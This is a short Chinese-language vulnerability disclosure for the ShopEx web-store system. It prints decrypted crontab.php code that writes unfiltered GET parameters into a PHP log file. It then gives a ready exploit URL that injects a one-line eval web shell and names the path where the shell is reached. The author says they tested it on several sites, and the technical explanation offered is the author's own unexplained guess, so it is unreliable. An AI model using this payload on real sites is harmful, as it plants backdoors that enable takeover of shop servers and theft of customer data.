ShopEx网店系统销售平台，是国内最早的网店软件提供商之一；是目前国内网店系统持续研发最久的公司；是目前网店软件国内市场占有率最高的软件提供商；是目前网店软件行业内规模最大的公司。

漏洞描述：crontab.php变量未进行严格过滤，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。

漏洞代码：
coreinclude_v5crontab.php zend加密后的，我只发布解密后的代码。
public function run( )
{
$this->logFile = HOME_DIR."/logs/access.log.php";
$this->now = time( );
$this->viewStat( );
$messenger =& $this->loadModel( "system/messenger" );
$messenger->runQueue( );
}
public function viewStat( )
{
if ( !file_exists( $this->logFile ) )
{
file_put_contents( $this->logFile, "#<?php exit()?>" ); //囧之处！By：小翔
}
if ( isset( $_GET[action] ) )
{
error_log( $this->now." ".$_GET[action]." ".$_GET[p]."", 3, $this->logFile );//没有任何过滤，

漏洞利用：

不知道原理，只测试了几个站，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。
直接提交：http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在：http://127.0.0.1/shopex/home/logs/access.log.php